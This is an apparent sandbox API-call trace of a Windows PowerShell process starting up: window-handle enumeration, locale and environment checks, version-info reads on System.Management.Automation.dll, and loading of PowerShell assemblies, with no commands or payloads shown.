	[0126.793] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x518
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x508
	[0126.793] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4ec
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x44c
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7ec
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x324
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4a0
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xcd0
	[0126.794] GetWindowThreadProcessId (in: hWnd=0x10284, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc50
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x6024a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc4c
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x60242, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc48
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x914
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x9b4
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x8fc
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xbc0
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xb0
	[0126.795] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x804
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xbc8
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x854
	[0126.795] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x140
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x55c
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x34c
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xb40
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x988
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x868
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x850
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x830
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x814
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x744
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x2a8
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x534
	[0126.796] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5e4
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5c4
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x58c
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x238
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x584
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7e8
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x678
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x35c
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x51c
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x360
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x274
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x588
	[0126.797] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0xc8
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x21c
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x664
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x334
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x5ec
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x550
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7a0
	[0126.798] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x594
	[0126.800] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.801] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x508
	[0126.801] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x4ec
	[0126.801] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x45c
	[0126.801] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1bdc30 | out: lpdwProcessId=0x1bdc30) returned 0x7ec
	[0126.804] WerSetFlags () returned 0x0
	[0126.811] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0126.811] CoTaskMemFree (pv=0x0) 
	[0126.812] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1bdf98, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1bdf90 | out: pulNumLanguages=0x1bdf98, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1bdf90) returned 1
	[0126.812] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1bdf98, pwszLanguagesBuffer=0x2d062f0, pcchLanguagesBuffer=0x1bdf90 | out: pulNumLanguages=0x1bdf98, pwszLanguagesBuffer=0x2d062f0, pcchLanguagesBuffer=0x1bdf90) returned 1
	[0126.817] CoTaskMemAlloc (cb=0x24) returned 0x2fe8d0
	[0126.817] GetUserDefaultLocaleName (in: lpLocaleName=0x2fe8d0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0126.818] CoTaskMemFree (pv=0x2fe8d0) 
	[0126.977] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0126.977] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.977] CoTaskMemFree (pv=0x2b5590) 
	[0126.980] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0126.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.980] CoTaskMemFree (pv=0x2b5590) 
	[0126.981] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0126.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0126.981] CoTaskMemFree (pv=0x2b5590) 
	[0126.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0126.991] SetErrorMode (uMode=0x1) returned 0x1
	[0126.991] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1bdc10 | out: lpFileInformation=0x1bdc10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0126.991] SetErrorMode (uMode=0x1) returned 0x1
	[0126.991] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1bde80 | out: lpdwHandle=0x1bde80) returned 0x94c
	[0126.992] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d09b80 | out: lpData=0x2d09b80) returned 1
	[0126.993] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1bddf8, puLen=0x1bddf0 | out: lplpBuffer=0x1bddf8*=0x2d09c1c, puLen=0x1bddf0) returned 1
	[0126.993] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09cf8, puLen=0x1bdd60) returned 1
	[0126.993] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0126.993] CoTaskMemAlloc (cb=0x2e) returned 0x2f8b30
	[0126.993] lstrcpyW (in: lpString1=0x2f8b30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0126.993] CoTaskMemFree (pv=0x2f8b30) 
	[0126.993] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09d4c, puLen=0x1bdd60) returned 1
	[0126.993] lstrlenW (lpString="System.Management.Automation") returned 28
	[0126.993] CoTaskMemAlloc (cb=0x3c) returned 0x301f00
	[0126.993] lstrcpyW (in: lpString1=0x301f00, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0126.993] CoTaskMemFree (pv=0x301f00) 
	[0126.993] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09da8, puLen=0x1bdd60) returned 1
	[0126.993] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.993] CoTaskMemAlloc (cb=0x20) returned 0x2fe930
	[0126.993] lstrcpyW (in: lpString1=0x2fe930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.994] CoTaskMemFree (pv=0x2fe930) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09de8, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.994] CoTaskMemAlloc (cb=0x44) returned 0x301f00
	[0126.994] lstrcpyW (in: lpString1=0x301f00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.994] CoTaskMemFree (pv=0x301f00) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09e50, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0126.994] CoTaskMemAlloc (cb=0x76) returned 0x29df00
	[0126.994] lstrcpyW (in: lpString1=0x29df00, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0126.994] CoTaskMemFree (pv=0x29df00) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09eec, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0126.994] CoTaskMemAlloc (cb=0x44) returned 0x301f00
	[0126.994] lstrcpyW (in: lpString1=0x301f00, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0126.994] CoTaskMemFree (pv=0x301f00) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09f50, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0126.994] CoTaskMemAlloc (cb=0x58) returned 0x25d480
	[0126.994] lstrcpyW (in: lpString1=0x25d480, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0126.994] CoTaskMemFree (pv=0x25d480) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09fcc, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0126.994] CoTaskMemAlloc (cb=0x20) returned 0x2fe930
	[0126.994] lstrcpyW (in: lpString1=0x2fe930, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0126.994] CoTaskMemFree (pv=0x2fe930) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x2d09c74, puLen=0x1bdd60) returned 1
	[0126.994] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0126.994] CoTaskMemAlloc (cb=0x66) returned 0x2fd090
	[0126.994] lstrcpyW (in: lpString1=0x2fd090, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0126.994] CoTaskMemFree (pv=0x2fd090) 
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x0, puLen=0x1bdd60) returned 0
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x0, puLen=0x1bdd60) returned 0
	[0126.994] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1bdd68, puLen=0x1bdd60 | out: lplpBuffer=0x1bdd68*=0x0, puLen=0x1bdd60) returned 0
	[0126.995] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1bdd38, puLen=0x1bdd30 | out: lplpBuffer=0x1bdd38*=0x2d09c1c, puLen=0x1bdd30) returned 1
	[0126.995] CoTaskMemAlloc (cb=0x204) returned 0x2989c0
	[0126.995] VerLanguageNameW (in: wLang=0x0, szLang=0x2989c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0126.995] CoTaskMemFree (pv=0x2989c0) 
	[0126.995] VerQueryValueW (in: pBlock=0x2d09b80, lpSubBlock="\\", lplpBuffer=0x1bdd88, puLen=0x1bdd80 | out: lplpBuffer=0x1bdd88*=0x2d09ba8, puLen=0x1bdd80) returned 1
	[0127.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bdc58 | out: phkResult=0x1bdc58*=0x308) returned 0x0
	[0127.148] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bdc1c, lpData=0x0, lpcbData=0x1bdc18*=0x0 | out: lpType=0x1bdc1c*=0x1, lpData=0x0, lpcbData=0x1bdc18*=0x56) returned 0x0
	[0127.149] CoTaskMemAlloc (cb=0x5a) returned 0x2fd020
	[0127.149] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1bdbec, lpData=0x2fd020, lpcbData=0x1bdbe8*=0x56 | out: lpType=0x1bdbec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1bdbe8*=0x56) returned 0x0
	[0127.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0127.182] CoTaskMemAlloc (cb=0x104) returned 0x2b5590
	[0127.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b5590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0127.182] CoTaskMemFree (pv=0x2b5590) 
	[0127.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0127.909] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0128.163] CoTaskMemAlloc (cb=0x104) returned 0x2b56a0
	[0128.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b56a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.164] CoTaskMemFree (pv=0x2b56a0) 
	[0128.165] CoTaskMemAlloc (cb=0x104) returned 0x2b56a0
	[0128.165] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b56a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0128.165] CoTaskMemFree (pv=0x2b56a0) 
	[0128.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0128.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0129.104] CoTaskMemAlloc (cb=0x104) returned 0x2b56a0
	[0129.104] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b56a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.104] CoTaskMemFree (pv=0x2b56a0) 
	[0129.107] CoTaskMemAlloc (cb=0x104) returned 0x2b56a0
	[0129.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b56a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0129.107] CoTaskMemFree (pv=0x2b56a0) 
	[0129.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0129.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0130.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0130.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0130.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1bd810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
